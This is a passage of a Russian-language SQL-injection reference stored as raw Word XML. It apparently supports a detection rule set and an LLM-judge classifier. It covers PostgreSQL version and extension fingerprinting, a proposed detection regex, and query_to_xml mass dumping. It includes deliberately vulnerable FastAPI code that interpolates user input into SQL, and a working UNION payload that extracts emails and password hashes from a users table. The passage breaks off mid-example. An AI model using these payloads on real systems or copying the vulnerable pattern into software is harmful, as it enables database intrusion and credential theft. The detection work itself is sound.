      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — преинсталлированный набор каждого провайдера известен заранее (RDS — большой список включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aws_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Cloud SQL — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsql_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Supabase — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_graphql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgsodium</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vault</w:t>
      </w:r>
      <w:r>
        <w:t>). Карта установленных extension даёт мгновенный fingerprint, какой провайдер хостит инстанс.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011077E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Детально по провайдерам — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD46C3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4349A7D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.1, 3.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — после fingerprinting атакующий идёт за картой схемы. 3.8.4 обычно первый, потому что версия меняет последующие payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB8F1B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из Payload C напрямую определяет, какие OOB-каналы открыты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D068B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из Payload C определяет, доступны ли plperlu/plpython3u/plsh для RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190C40F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('is_superuser')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — проверка успешности эскалации между шагами 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BE4AD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Раздел 4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server_version_num</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из Payload B — ключ к таблицам версий из 4.6. Каждая CVE в разделе 4 имеет диапазон затрагиваемых </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server_version_num</w:t>
      </w:r>
      <w:r>
        <w:t>; атакующий пишет lookup-таблицу версия→CVE сам, документ даёт основу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54491149" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без других сигналов сложно классифицировать как атаку (легитимные use case многочисленны). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> добавить в regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.8.1) низкоприоритетную ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version\(\)|pg_settings|pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>risk_score = 4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (informational); решающий сигнал — комбинация с UNION, конкатенацией или JOIN на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Логику комбинации — не в rule-based слое, а в LLM-судье. Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.8.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122903CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8380A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Information Functions — version() / current_setting()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA59F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Views — pg_settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0689F20F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Catalogs — pg_extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7517EC0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Catalogs — pg_available_extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C7E7A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Source: src/include/pg_config.h.in — PG_VERSION constants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E89DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — PostgreSQL fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CBFD31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — version &amp; enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BCF7B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.8.5 query_to_xml, table_to_xml, database_to_xml — массовый дамп одним вызовом</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41785384" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml(text, bool, bool, text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — встроенная функция: принимает произвольный SQL-текст, выполняет его и возвращает результат сериализованным в XML. Один вызов = весь результат запроса в одной строке XML. Аналогичные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_to_xml('schema.tbl'::regclass, ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database_to_xml(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дампят таблицу или всю БД, к которой у роли есть SELECT. Для атакующего это означает: где обычная UNION-инъекция требует подбора количества колонок и итеративного перебора строк </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(3.1), один вызов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через UNION возвращает всю выборку как одно текстовое значение — без подбора структуры, без chunked-эксфильтрации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4028CA97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F0E250" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/catalog.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2700A2"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46504482" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1060FA3C"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736C7C74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF51DF"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2F24A8DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6ED963" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33968029" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF6C87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB34365" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/catalog")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412D570D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_items(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03717401" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    section: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327BFB84"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596CD6C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F78C312" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E07284" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"SELECT id, sku, price FROM items WHERE section = '{section}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B95F7C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034FBEF4"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255D3D75"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050B686F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Три колонки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numeric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). XML-результат уйдёт в среднюю колонку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sku</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B213E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — `query_to_xml` с произвольным SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B2A437" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `section`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B52B244" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, query_to_xml('SELECT id, email, password_hash FROM users LIMIT 50', true, false, '')::text, 0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D9DD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED115B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, sku, price FROM items WHERE section = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF9823" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
